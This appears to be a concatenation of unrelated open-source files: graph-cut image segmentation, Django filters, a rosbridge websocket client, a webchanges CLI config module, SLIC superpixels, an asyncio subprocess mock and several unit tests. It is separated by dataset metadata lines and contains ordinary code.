spatial_differences = current_coordinates - neighbour_coordinates
spatial_differences = np.linalg.norm(spatial_differences, axis=1)
neighbour_costs = np.divide(np.exp(-np.square(pixel_distances) / (2 * np.square(sigma))),
spatial_differences)
for k in range(0, np.size(neighbour_indices.ravel())):
neighbour_index = neighbour_indices[k]
cost = neighbour_costs[k]
pairwise.append([current_index, neighbour_index, 0, cost, 0, 0])
if current_index%1000 == 0:
print(current_index, '/', image_rows*image_cols)
pairwise = np.asarray(pairwise)
return pairwise
# TODO TASK 2.4 get segmented image to the view
def __get_segmented_image(self, image, labels, background=None):
"""
Return a segmented image, as well as an image with new background
:param image: color image as a numpy array
:param label: labels a numpy array
:param background: color image as a numpy array
:return image_segmented: image as a numpy array with red foreground, blue background
:return image_with_background: image as a numpy array with changed background if any (None if not)
"""
image_rows = np.size(image, 0)
image_cols = np.size(image, 1)
not_labels = np.logical_not(labels)
mask = np.zeros((image_rows, image_cols, 3), dtype=np.uint8)
mask[not_labels, :] = np.array([255, 0, 0], dtype=np.uint8)
mask[labels, :] = np.array([0, 0, 255])
image_PIL = Image.fromarray(image)
mask_PIL = Image.fromarray(mask)
result_PIL = Image.blend(image_PIL, mask_PIL, 0.6)
segmented_image = np.array(result_PIL)
if background is not None:
mask = np.zeros((image_rows, image_cols), dtype=np.bool)
mask[np.logical_not(labels)] = np.bool(1)
result = np.copy(background[0:image_rows, 0:image_cols, :])
result.setflags(write=1)
result[not_labels, 0:3] = image[not_labels, 0:3]
segmented_image_with_background = result
else:
segmented_image_with_background = None
return segmented_image, segmented_image_with_background
def segment_image(self, image, seed_fg, seed_bg, lambda_value, background=None):
image_array = np.asarray(image)
background_array = None
if background:
background = background.convert("RGB")
background_array = np.asarray(background)
seed_fg = np.array(seed_fg)
seed_bg = np.array(seed_bg)
height, width = np.shape(image_array)[0:2]
num_pixels = height * width
# TASK 2.1 - get the color histogram for the unaries
hist_res = 32
cost_fg = self.__get_color_histogram(image_array, seed_fg, hist_res)
cost_bg = self.__get_color_histogram(image_array, seed_bg, hist_res)
# TASK 2.2-2.3 - set the unaries and the pairwise terms
unaries = self.__get_unaries(image_array, lambda_value, cost_fg, cost_bg, seed_fg, seed_bg)
pairwise = self.__get_pairwise(image_array, sigma=5)
# TODO: TASK 2.4 - perform graph cut
g = GraphCut(num_pixels, pairwise.__len__())
g.set_unary(unaries)
g.set_pairwise(pairwise)
g.minimize()
labels = g.get_labeling()
labels = np.reshape(labels, (height, width))
# plt.imshow(labels)
# plt.show()
# TODO TASK 2.4 get segmented image to the view
segmented_image, segmented_image_with_background = self.__get_segmented_image(image_array, labels, background_array)
# transform image array to an rgb image
segmented_image = Image.fromarray(segmented_image, 'RGB')
self._view.set_canvas_image(segmented_image)
if segmented_image_with_background is not None:
segmented_image_with_background = Image.fromarray(segmented_image_with_background, 'RGB')
plt.imshow(segmented_image_with_background)
plt.show()
| 2.96875 | 3 |
notaso/restapiv2/filters.py | jpadilla/notaso | 11 | 12767354 | <gh_stars>10-100
import django_filters
from ..professors.models import Professor
from ..universities.models import University
class UniversityFilter(django_filters.FilterSet):
"""
Filter by University city
"""
class Meta:
model = University
fields = ["name", "city"]
class ProfessorFilter(django_filters.FilterSet):
"""
Filter professors by university name,
university city, department and score.
"""
university_name = django_filters.CharFilter(field_name="university__name")
university_city = django_filters.CharFilter(field_name="university__city")
department = django_filters.CharFilter(field_name="department__name")
class Meta:
model = Professor
fields = ["university_name", "university_city", "department", "gender", "score"]
| 2.40625 | 2 |
python/test.py | syoyo/eson | 20 | 12767355 | <gh_stars>10-100
import eson
import struct
def packFloatList( floatList ):
return struct.pack( '<%sf' % len( floatList ), *floatList )
d = {}
farr = [1.0, 2.0, 2.1, 3.0, 3.5]
d['aa'] = long(3) # int() is still OK
d['bb'] = float(3)
d['cc'] = packFloatList(farr)
ed = eson.dumps(d)
f = open("test.eson", "wb")
f.write(ed)
f.close()
| 2.515625 | 3 |
flo_web/src/wsFactory.py | Rehab-Robotics-Lab/LilFloSystem | 10 | 12767356 | <gh_stars>1-10
#!/usr/bin/env python
# pylint: skip-file
# This file comes copied from a library. There are only a few
# modified lines. Will leave style errors in place.
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of <NAME>, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
from rosbridge_library.capabilities.call_service import CallService
from rosbridge_library.capabilities.unadvertise_service import UnadvertiseService
from rosbridge_library.capabilities.advertise_service import AdvertiseService
from rosbridge_library.capabilities.subscribe import Subscribe
from rosbridge_library.capabilities.publish import Publish
from rosbridge_library.capabilities.advertise import Advertise
from wsConnector import RosbridgeWebSocket
from rosbridge_server import ClientManager
import os
import rospy
import sys
from twisted.python import log
from twisted.internet import reactor, ssl
from twisted.internet.error import CannotListenError, ReactorNotRunning
from twisted.internet.protocol import ReconnectingClientFactory
from autobahn.twisted.websocket import WebSocketServerFactory, listenWS
from autobahn.twisted.websocket import WebSocketClientFactory
from autobahn.websocket.compress import (PerMessageDeflateOffer,
PerMessageDeflateOfferAccept)
from autobahn.twisted.websocket import connectWS
log.startLogging(sys.stdout)
def shutdown_hook():
try:
reactor.stop()
except ReactorNotRunning:
rospy.logwarn("Can't stop the reactor, it wasn't running")
class ReconnectingWebSocketClientFactory(ReconnectingClientFactory, WebSocketClientFactory):
protocol = RosbridgeWebSocket
maxDelay = 1
if __name__ == "__main__":
rospy.init_node("rosbridge_websocket")
##################################################
# Parameter handling #
##################################################
retry_startup_delay = rospy.get_param(
'~retry_startup_delay', 2.0) # seconds
use_compression = rospy.get_param('~use_compression', False)
# get RosbridgeProtocol parameters
RosbridgeWebSocket.fragment_timeout = rospy.get_param('~fragment_timeout',
RosbridgeWebSocket.fragment_timeout)
RosbridgeWebSocket.delay_between_messages = rospy.get_param('~delay_between_messages',
RosbridgeWebSocket.delay_between_messages)
RosbridgeWebSocket.max_message_size = rospy.get_param('~max_message_size',
RosbridgeWebSocket.max_message_size)
RosbridgeWebSocket.unregister_timeout = rospy.get_param('~unregister_timeout',
RosbridgeWebSocket.unregister_timeout)
bson_only_mode = rospy.get_param('~bson_only_mode', False)
if RosbridgeWebSocket.max_message_size == "None":
RosbridgeWebSocket.max_message_size = None
ping_interval = float(rospy.get_param('~websocket_ping_interval', 0))
ping_timeout = float(rospy.get_param('~websocket_ping_timeout', 30))
port = rospy.get_param('~port', 8080)
address = rospy.get_param('~address', "0.0.0.0")
external_port = int(rospy.get_param('~websocket_external_port', port))
RosbridgeWebSocket.client_manager = ClientManager()
# Get the glob strings and parse them as arrays.
RosbridgeWebSocket.topics_glob = [
element.strip().strip("'")
for element in rospy.get_param('~topics_glob', '')[1:-1].split(',')
if len(element.strip().strip("'")) > 0]
RosbridgeWebSocket.services_glob = [
element.strip().strip("'")
for element in rospy.get_param('~services_glob', '')[1:-1].split(',')
if len(element.strip().strip("'")) > 0]
RosbridgeWebSocket.params_glob = [
element.strip().strip("'")
for element in rospy.get_param('~params_glob', '')[1:-1].split(',')
if len(element.strip().strip("'")) > 0]
if "--port" in sys.argv:
idx = sys.argv.index("--port")+1
if idx < len(sys.argv):
port = int(sys.argv[idx])
else:
print("--port argument provided without a value.")
sys.exit(-1)
if "--address" in sys.argv:
idx = sys.argv.index("--address")+1
if idx < len(sys.argv):
address = str(sys.argv[idx])
else:
print("--address argument provided without a value.")
sys.exit(-1)
if "--retry_startup_delay" in sys.argv:
idx = sys.argv.index("--retry_startup_delay") + 1
if idx < len(sys.argv):
retry_startup_delay = int(sys.argv[idx])
else:
print("--retry_startup_delay argument provided without a value.")
sys.exit(-1)
if "--fragment_timeout" in sys.argv:
idx = sys.argv.index("--fragment_timeout") + 1
if idx < len(sys.argv):
RosbridgeWebSocket.fragment_timeout = int(sys.argv[idx])
else:
print("--fragment_timeout argument provided without a value.")
sys.exit(-1)
if "--delay_between_messages" in sys.argv:
idx = sys.argv.index("--delay_between_messages") + 1
if idx < len(sys.argv):
RosbridgeWebSocket.delay_between_messages = float(sys.argv[idx])
else:
print("--delay_between_messages argument provided without a value.")
sys.exit(-1)
if "--max_message_size" in sys.argv:
idx = sys.argv.index("--max_message_size") + 1
if idx < len(sys.argv):
value = sys.argv[idx]
if value == "None":
RosbridgeWebSocket.max_message_size = None
else:
RosbridgeWebSocket.max_message_size = int(value)
else:
print(
"--max_message_size argument provided without a value. (can be None or <Integer>)")
sys.exit(-1)
if "--unregister_timeout" in sys.argv:
idx = sys.argv.index("--unregister_timeout") + 1
if idx < len(sys.argv):
unregister_timeout = float(sys.argv[idx])
else:
print("--unregister_timeout argument provided without a value.")
sys.exit(-1)
if "--topics_glob" in sys.argv:
idx = sys.argv.index("--topics_glob") + 1
if idx < len(sys.argv):
value = sys.argv[idx]
if value == "None":
RosbridgeWebSocket.topics_glob = []
else:
RosbridgeWebSocket.topics_glob = [element.strip().strip(
"'") for element in value[1:-1].split(',')]
else:
print(
"--topics_glob argument provided without a value. (can be None or a list)")
sys.exit(-1)
if "--services_glob" in sys.argv:
idx = sys.argv.index("--services_glob") + 1
if idx < len(sys.argv):
value = sys.argv[idx]
if value == "None":
RosbridgeWebSocket.services_glob = []
else:
RosbridgeWebSocket.services_glob = [element.strip().strip(
"'") for element in value[1:-1].split(',')]
else:
print(
"--services_glob argument provided without a value. (can be None or a list)")
sys.exit(-1)
if "--params_glob" in sys.argv:
idx = sys.argv.index("--params_glob") + 1
if idx < len(sys.argv):
value = sys.argv[idx]
if value == "None":
RosbridgeWebSocket.params_glob = []
else:
RosbridgeWebSocket.params_glob = [element.strip().strip(
"'") for element in value[1:-1].split(',')]
else:
print(
"--params_glob argument provided without a value. (can be None or a list)")
sys.exit(-1)
if ("--bson_only_mode" in sys.argv) or bson_only_mode:
RosbridgeWebSocket.bson_only_mode = bson_only_mode
if "--websocket_ping_interval" in sys.argv:
idx = sys.argv.index("--websocket_ping_interval") + 1
if idx < len(sys.argv):
ping_interval = float(sys.argv[idx])
else:
print("--websocket_ping_interval argument provided without a value.")
sys.exit(-1)
if "--websocket_ping_timeout" in sys.argv:
idx = sys.argv.index("--websocket_ping_timeout") + 1
if idx < len(sys.argv):
ping_timeout = float(sys.argv[idx])
else:
print("--websocket_ping_timeout argument provided without a value.")
sys.exit(-1)
if "--websocket_external_port" in sys.argv:
idx = sys.argv.index("--websocket_external_port") + 1
if idx < len(sys.argv):
external_port = int(sys.argv[idx])
else:
print("--websocket_external_port argument provided without a value.")
sys.exit(-1)
# To be able to access the list of topics and services, you must be able to access the rosapi services.
if RosbridgeWebSocket.services_glob:
RosbridgeWebSocket.services_glob.append("/rosapi/*")
Subscribe.topics_glob = RosbridgeWebSocket.topics_glob
Advertise.topics_glob = RosbridgeWebSocket.topics_glob
Publish.topics_glob = RosbridgeWebSocket.topics_glob
AdvertiseService.services_glob = RosbridgeWebSocket.services_glob
UnadvertiseService.services_glob = RosbridgeWebSocket.services_glob
CallService.services_glob = RosbridgeWebSocket.services_glob
# Support the legacy "" address value.
# The socket library would interpret this as INADDR_ANY.
if not address:
address = '0.0.0.0'
##################################################
# Done with parameter handling #
##################################################
def handle_compression_offers(offers):
if not use_compression:
return
for offer in offers:
if isinstance(offer, PerMessageDeflateOffer):
return PerMessageDeflateOfferAccept(offer)
# if certfile is not None and keyfile is not None:
# protocol = 'wss'
# context_factory = ssl.DefaultOpenSSLContextFactory(keyfile, certfile)
# else:
# protocol = 'ws'
# context_factory = None
# For testing purposes, use an ephemeral port if port == 0.
# Write the actual port as a param for tests to read.
# rospy.set_param('~actual_port', port)
# uri = '{}://{}:{}'.format(protocol, address, port)
# uri = 'wss://localhost/host/'
uri = 'wss://{}/host/'.format(address)
rospy.loginfo('setting factory to connect to %s', uri)
ROBOT_NAME = os.environ['ROBOT_NAME']
ROBOT_PASSWORD = os.environ['ROBOT_PASSWORD']
rospy.loginfo('connecting to server with name: %s', ROBOT_NAME)
HEADERS = {
'robotName': ROBOT_NAME,
'robotPassword': <PASSWORD>
}
factory = ReconnectingWebSocketClientFactory(uri, headers=HEADERS)
factory.protocol = RosbridgeWebSocket
factory.setProtocolOptions(
perMessageCompressionAccept=handle_compression_offers,
autoPingInterval=ping_interval,
autoPingTimeout=ping_timeout,
)
connected = False
while not connected and not rospy.is_shutdown():
try:
# reactor.connectTCP("192.168.1.7", 443, factory)
connectWS(factory, ssl.ClientContextFactory())
# TODO: Need to get this ip address to be web address.
# listenWS(factory, context_factory)
rospy.loginfo(
'Rosbridge WebSocket client connect to {}'.format(uri))
connected = True
except CannotListenError as e:
rospy.logwarn("Unable to start server: " + str(e) +
" Retrying in " + str(retry_startup_delay) + "s.")
rospy.sleep(retry_startup_delay)
rospy.on_shutdown(shutdown_hook)
reactor.run()
| 1.257813 | 1 |
webchanges/config.py | scottmac/webchanges | 0 | 12767357 | <filename>webchanges/config.py
"""Command-line configuration."""
import argparse
import os
from os import PathLike
from pathlib import Path
from typing import List, Optional, Union
from . import __doc__, __project_name__, __version__
class BaseConfig(object):
"""Base configuration class."""
def __init__(
self,
project_name: str,
config_dir: Path,
config: Path,
jobs: Path,
hooks: Path,
cache: Union[str, PathLike],
verbose: bool,
) -> None:
self.project_name = project_name
self.config_dir = config_dir
self.config = config
self.jobs = jobs
self.hooks = hooks
self.cache = cache
self.verbose = verbose
class CommandConfig(BaseConfig):
"""Command line arguments configuration."""
def __init__(
self,
project_name: str,
config_dir: Path,
config: Path,
jobs: Path,
hooks: Path,
cache: Union[str, PathLike],
verbose: bool,
) -> None:
super().__init__(project_name, config_dir, config, jobs, hooks, cache, verbose)
self.joblist: Optional[List[int]] = None
self.list: bool = False
self.errors: bool = False
self.test_job: Optional[str] = None
self.test_diff: Optional[str] = None
self.add: Optional[str] = None
self.delete: Optional[str] = None
self.test_reporter: Optional[str] = None
self.smtp_login: bool = False
self.telegram_chats: bool = False
self.xmpp_login: bool = False
self.edit: bool = False
self.edit_config: bool = False
self.edit_hooks: bool = False
self.gc_cache: bool = False
self.clean_cache: bool = False
self.rollback_cache: Optional[int] = None
self.delete_snapshot: Optional[str] = None
self.database_engine: str = 'sqlite3'
self.max_snapshots: int = 4
self.features: bool = False
self.log_level: str = 'DEBUG'
self.parse_args()
def parse_args(self) -> argparse.ArgumentParser:
"""Python arguments parser."""
parser = argparse.ArgumentParser(
description=__doc__.replace('\n\n', '--par--').replace('\n', ' ').replace('--par--', '\n\n'),
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
'joblist',
nargs='*',
type=int,
help='job(s) to run (by index as per --list) (default: run all jobs)',
metavar='JOB',
)
parser.add_argument('-V', '--version', action='version', version=f'{__project_name__} {__version__}')
parser.add_argument('-v', '--verbose', action='store_true', help='show logging output')
group = parser.add_argument_group('override file defaults')
group.add_argument(
'--jobs',
'--urls',
default=self.jobs,
type=Path,
help='read job list (URLs) from FILE',
metavar='FILE',
dest='jobs',
)
group.add_argument(
'--config', default=self.config, type=Path, help='read configuration from FILE', metavar='FILE'
)
group.add_argument('--hooks', default=self.hooks, type=Path, help='use FILE as hooks.py module', metavar='FILE')
group.add_argument(
'--cache',
default=self.cache,
type=Path,
help='use FILE as cache (snapshots database) or directory, alternatively a redis URI',
metavar='FILE',
)
group.add_argument('--list', action='store_true', help='list jobs and their index number')
group.add_argument('--errors', action='store_true', help='list jobs with errors or no data captured')
group.add_argument(
'--test',
'--test-filter',
help='test a job (by index or URL/command) and show filtered output',
metavar='JOB',
dest='test_job',
)
group.add_argument(
'--test-diff',
'--test-diff-filter',
help='test and show diff using existing saved snapshots of a job (by index or URL/command)',
metavar='JOB',
dest='test_diff',
)
group.add_argument(
'--add',
help='add job (key1=value1,key2=value2,...). WARNING: all remarks are deleted from '
'jobs file; use --edit instead!',
metavar='JOB',
)
group.add_argument(
'--delete',
help='delete job by URL/command or index number. WARNING: all remarks are '
'deleted from jobs file; use --edit instead!',
metavar='JOB',
)
group = parser.add_argument_group('reporters')
group.add_argument('--test-reporter', help='send a test notification', metavar='REPORTER')
group.add_argument(
'--smtp-login',
action='store_true',
help='verify SMTP login credentials with server and, if stored in keyring, enter or check ' 'password',
)
group.add_argument('--telegram-chats', action='store_true', help='list telegram chats program is joined to')
group.add_argument(
'--xmpp-login', action='store_true', help='enter or check password for XMPP (stored in keyring)'
)
group = parser.add_argument_group('launch editor ($EDITOR/$VISUAL)')
group.add_argument('--edit', action='store_true', help='edit job (URL/command) list')
group.add_argument('--edit-config', action='store_true', help='edit configuration file')
group.add_argument('--edit-hooks', action='store_true', help='edit hooks script')
group = parser.add_argument_group('database')
group.add_argument(
'--gc-cache',
action='store_true',
help='garbage collect the cache database by removing old snapshots plus all data of jobs'
' not in the jobs file',
)
group.add_argument('--clean-cache', action='store_true', help='remove old snapshots from the cache database')
group.add_argument(
'--rollback-cache',
type=int,
help='delete recent snapshots > timestamp; backup the database before using!',
metavar='TIMESTAMP',
)
group.add_argument(
'--delete-snapshot', help='delete the last saved snapshot of job (URL/command)', metavar='JOB'
)
group.add_argument(
'--database-engine',
default='sqlite3',
choices=['sqlite3', 'redis', 'minidb', 'textfiles'],
help='database engine to use (default: %(default)s unless redis URI in --cache)',
)
group.add_argument(
'--max-snapshots',
default=4,
type=int,
help='maximum number of snapshots to retain in sqlite3 database (default: %(default)s)',
metavar='NUM_SNAPSHOTS',
)
group = parser.add_argument_group('miscellaneous')
group.add_argument('--features', action='store_true', help='list supported job types, filters and reporters')
group.add_argument(
'--log-level',
default='DEBUG',
choices=('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'),
help='level of logging output if -v is selected (default: %(default)s)',
)
# workaround for avoiding triggering error when invoked by pytest
if parser.prog != '_jb_pytest_runner.py' and not os.getenv('CI'):
args = parser.parse_args()
for arg in vars(args):
argval = getattr(args, arg)
setattr(self, arg, argval)
return parser
| 2.265625 | 2 |
src/superpixels.py | dotimothy/EECS195-Colorization | 2 | 12767358 | # superpixels.py Performs SLIC algorithm #
# Authors: <NAME>, <NAME>, <NAME>, <NAME>``
# import the necessary packages
from skimage.segmentation import slic
from skimage.segmentation import mark_boundaries
from skimage.util import img_as_float
from skimage.util import img_as_ubyte
from skimage import data, io, segmentation, color
from skimage.color import rgb2gray
from skimage.future import graph
import matplotlib.pyplot as plt
import argparse
import numpy as np
import cv2
import os
# Weighting Functions based on Color Intensities
def _weight_mean_color(graph, src, dst, n):
diff = graph.nodes[dst]['mean color'] - graph.nodes[n]['mean color']
diff = np.linalg.norm(diff)
return {'weight': diff}
def merge_mean_color(graph, src, dst):
graph.nodes[dst]['total color'] += graph.nodes[src]['total color']
graph.nodes[dst]['pixel count'] += graph.nodes[src]['pixel count']
graph.nodes[dst]['mean color'] = (graph.nodes[dst]['total color'] /
graph.nodes[dst]['pixel count'])
# Grayscale & Segments the Image as a Color
def segmentImage(sourcePath,destPath):
image_gray = rgb2gray(io.imread(sourcePath))
image = io.imread(sourcePath)
#gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
image_gray = np.dstack([image_gray, image_gray, image_gray])
image_gray = img_as_float(image_gray)
# load the image and convert it to a floating point data type
# loop over the number of segments
#for numSegments in (100,200,300):
numSegments = 10000
# apply SLIC and extract (approximately) the supplied number
# of segments
segments = slic(image_gray, n_segments = numSegments, sigma = 5)
g = graph.rag_mean_color(image,segments)
labels2 = graph.merge_hierarchical(segments, g, thresh=35, rag_copy=False,
in_place_merge=True,
merge_func=merge_mean_color,
weight_func=_weight_mean_color)
out = color.label2rgb(labels2, image, kind='avg', bg_label=0)
#out = segmentation.mark_boundaries(out, labels2, color=(0,0,0))
# saves segmented image
# fig = plt.figure("Superpixels -- %d segments" % (numSegments))
# ax = fig.add_subplot(1, 1, 1)
# ax.imshow(mark_boundaries(image,segments,color=(0,0,0)))
# Saving Image
io.imsave(destPath,img_as_ubyte(out))
#Prints Every Single Segment
# for (i, segVal) in enumerate(np.unique(segments)):
# print("[x] inspecting segment %d" % (i))
# mask = np.zeros(image.shape[:2], dtype = "uint8")
# mask[segments == segVal] = 255
# # show the masked region
# cv2.imshow("Mask", mask)
# cv2.imshow("Applied", cv2.bitwise_and(image, image, mask = mask))
# cv2.waitKey(1)
#plt.axis("off")
# show the plots
#plt.show()
# Segments
def segmentFolder(source,dest):
# Loops through directory for images
for file in os.listdir(source):
isPicture = file.endswith(".jpg") or file.endswith(".png") or file.endswith(".JPG") or file.endswith(".PNG")
if isPicture == True:
segmentImage(source + file, dest + file)
| 2.59375 | 3 |
skultrafast/tests/test_data_io.py | cZahn/skultrafast | 1 | 12767359 | <gh_stars>1-10
from skultrafast import data_io
from pathlib import Path
def test_load_exmaple():
wl, t, d = data_io.load_example()
assert ((t.shape[0], wl.shape[0]) == d.shape)
def test_path_loader():
p = data_io.get_example_path('sys_response')
assert Path(p).exists()
p = data_io.get_example_path('messpy')
assert Path(p).exists()
| 2.15625 | 2 |
src/aiotk/_testing.py | AndreLouisCaron/aiotk | 5 | 12767360 | # -*- coding: utf-8 -*-
import asyncio
import inspect
import os
import signal as _signal
import sys
import traceback
from asyncio import (
AbstractEventLoop,
StreamReader,
StreamWriter,
)
from asyncio import Queue # noqa: F401
from contextlib import contextmanager
from itertools import count
from unittest import mock
from typing import (
Callable,
Iterable,
Iterator,
Optional,
TextIO,
Tuple,
Union,
)
from ._mempipe import mempipe
def call_with_minimal_args(f: Callable, **kwds):
spec = inspect.signature(f)
kwds = {
k: kwds[k] for k, p in spec.parameters.items()
if p.kind != inspect.Parameter.VAR_KEYWORD
}
return f(**kwds)
class OutputStreamAdapter(StreamWriter):
"""StreamWriter that wraps a file-like object."""
def __init__(self, stream: TextIO) -> None:
self._stream = stream
def write(self, data: bytes) -> None:
self._stream.write(data.decode('utf-8'))
def writelines(self, lines: Iterable[bytes]) -> None:
for line in lines:
self._stream.write(line.decode('utf-8'))
self._stream.write('\n')
def can_write_eof(self) -> bool:
return True
# TODO: test this without closing the "real" sys.stdout!
def write_eof(self) -> None:
# self._stream.close()
pass
# NOTE: impossible to please `mypy` because documented signature is
# incomplete.
async def drain(self):
self._stream.flush()
class Process(object):
"""Mock for ``asyncio.subprocess.Process``."""
def __init__(self, *,
pid: int,
run: Callable,
argv=[],
env=None,
kwds={},
stdin: Optional[int]=None,
stdout: Union[int, TextIO, None]=None,
stderr: Union[int, TextIO, None]=None,
limit: Optional[int]=None,
loop: Optional[AbstractEventLoop]=None) -> None:
self._loop = loop or asyncio.get_event_loop()
self._pid = pid
self._stdin = None # type: Optional[StreamWriter]
self._stdout = None # type: Optional[StreamReader]
self._stderr = None # type: Optional[StreamReader]
# Handle standard input redirection.
r_stdin = None # Optional[StreamReader]
if stdin == asyncio.subprocess.PIPE:
r_stdin, self._stdin = mempipe(limit=limit, loop=loop)
else:
# TODO: wrap `sys.stdin` in a `StreamReader`.
r_stdin, self._stdin = None, None
# Handle standard output redirection.
if stdout == asyncio.subprocess.PIPE:
self._stdout, w_stdout = mempipe(limit=limit, loop=loop)
else:
stdout = stdout or sys.stdout
assert stdout is not None
assert not isinstance(stdout, int)
self._stdout, w_stdout = None, OutputStreamAdapter(stdout)
# Handle standard error redirection.
if stderr == asyncio.subprocess.PIPE:
self._stderr, w_stderr = mempipe(limit=limit, loop=loop)
else:
stderr = stderr or sys.stderr
assert stderr is not None
assert not isinstance(stderr, int)
self._stderr, w_stderr = None, OutputStreamAdapter(stderr)
# Mock signal handling.
self._signals = asyncio.Queue() # type: Queue
# Start the application-defined process simulation.
self._done = asyncio.Event(loop=loop)
self._task = self._loop.create_task(self._run_wrapper(
run,
stdin=r_stdin,
stdout=w_stdout,
stderr=w_stderr,
signals=self._signals,
env=env or {k: v for k, v in os.environ.items()},
argv=argv,
kwds=kwds,
))
# Keep a reference to the streams, we'll need them later.
self._w_stdout = w_stdout
self._w_stderr = w_stderr
# Process exit code is undefined until the simulation completes.
self._returncode = None # type: Optional[int]
async def _run_wrapper(self, run: Callable,
*, stdout, stderr, **kwds) -> int:
try:
return await call_with_minimal_args(
run, stdout=stdout, stderr=stderr, **kwds
)
except asyncio.CancelledError:
return 1
finally:
await stdout.drain()
await stderr.drain()
self._done.set()
@property
def pid(self) -> int:
return self._pid
@property
def stdin(self) -> Optional[StreamWriter]:
return self._stdin
@property
def stdout(self) -> Optional[StreamReader]:
return self._stdout
@property
def stderr(self) -> Optional[StreamReader]:
return self._stderr
async def wait(self) -> int:
await asyncio.wait({self._task})
await self._done.wait()
e = self._task.exception()
if e is None:
r = self._task.result()
if r is None:
r = 0
self._returncode = r
else:
# Format traceback and send it to stderr (as if it had been printed
# in the child process' output).
self._w_stderr.writelines(
line.encode('utf-8')
for line in traceback.format_exception(
e.__class__, e, e.__traceback__
)
)
self._returncode = 1
assert self._w_stdout
assert self._w_stderr
self._w_stdout.write_eof()
self._w_stderr.write_eof()
return self._returncode
async def communicate(self, input: bytes=b'') -> Tuple[Optional[bytes],
Optional[bytes]]:
if self._stdin:
self._stdin.write(input)
self._stdin.write_eof()
await self.wait()
stdout = None
if self._stdout:
stdout = await self._stdout.read()
stderr = None
if self._stderr:
stderr = await self._stderr.read()
return stdout, stderr
def send_signal(self, signal: int) -> None:
self._signals.put_nowait(signal)
def terminate(self) -> None:
self._task.cancel()
def kill(self) -> None:
if sys.platform == 'win32':
self.terminate()
else:
# NOTE: for a real process, we'd send SIGKILL, which would then be
# passed as SIGINT to the application, but we don't have a
# kernel to make that substution here.
self.send_signal(_signal.SIGINT)
@property
def returncode(self) -> Optional[int]:
return self._returncode
@contextmanager
def mock_subprocess(run: Callable,
loop: Optional[AbstractEventLoop]=None) -> Iterator[None]:
"""Calls ``run()`` instead of spawning a sub-process.
:param run: A coroutine function that simulates the sub-process. Can
return ``None`` or ``0`` to simulate successful process execution or a
non-zero error code to simulate sub-process terminate with a non-zero exit
code. If an exception is raised, the result is 1 (non-zero). This
function can accept a variable number of arguments, see below.
Dependency injection is used with the ``run()`` coroutine function to pass
only arguments that are declared in the function's signature. Omit all but
the arguments you intend to use. Here are all the available arguments:
- ``argv``: a list of strings passed as positional arguments to
``asyncio.create_subprocess_exec()``.
- ``stdin``: an ``asyncio.StreamReader`` instance. When output is not
redirected, this reads from the "real" ``sys.stdin``.
- ``stdout``: an ``asyncio.StreamWriter`` instance. When output is not
redirected, this writes to the "real" ``sys.stdout``.
- ``stderr``: an ``asyncio.StreamWriter`` instance. When output is not
redirected, this writes to the "real" ``sys.stderr``.
- ``env``: a ``dict`` containing environment variables passed to
``asyncio.create_subprocess_exec()``.
- ``signals``: an ``asyncio.Queue`` object that receives integers passed to
``asyncio.Process.send_signal()``.
- ``kwds``: extra keyword arguments passed to
``asyncio.create_subprocess_exec()``.
.. versionadded:: 0.1
"""
loop = loop or asyncio.get_event_loop()
pid = count(start=1)
def create_subprocess_exec(*args, stdin=None, stdout=None, env=None,
stderr=None, loop=None, limit=None, **kwds):
"""Mock for ``asyncio.create_subprocess_exec()``."""
loop = loop or asyncio.get_event_loop()
f = asyncio.Future()
process = Process(
pid=next(pid),
run=run,
loop=loop,
argv=list(args),
stdin=stdin,
stdout=stdout,
stderr=stderr,
env=env,
limit=limit,
kwds=kwds,
)
loop.call_soon(f.set_result, process)
return f
with mock.patch('asyncio.create_subprocess_exec', create_subprocess_exec):
yield None
| 2.328125 | 2 |
deuceclient/tests/test_api_project.py | BenjamenMeyer/deuce-client | 0 | 12767361 | """
Tests - Deuce Client - API - Project
"""
from unittest import TestCase
import deuceclient.api as api
import deuceclient.common.errors as errors
import deuceclient.common.validation as val
from deuceclient.tests import *
class ProjectTest(TestCase):
def setUp(self):
super(ProjectTest, self).setUp()
self.project_id = create_project_name()
self.vault_id = create_vault_name()
def test_create_project(self):
project = api.Project(self.project_id)
self.assertEqual(project.project_id, self.project_id)
def test_create_project_bad_type(self):
with self.assertRaises(TypeError):
project = api.Project(bytes(self.project_id))
def test_project_name_invalid(self):
with self.assertRaises(errors.InvalidProject):
project = api.Project(self.project_id + '$')
# Build project name that is too long
x = self.project_id
while len(x) < (val.PROJECT_ID_MAX_LEN + 1):
x = '{0}_{1}'.format(x, self.project_id)
with self.assertRaises(errors.InvalidProject):
project = api.Project(x)
def test_set_marker(self):
project = api.Project(self.project_id)
self.assertIsNone(project.marker)
project.marker = self.vault_id
self.assertIsNotNone(project.marker)
self.assertEqual(project.marker,
self.vault_id)
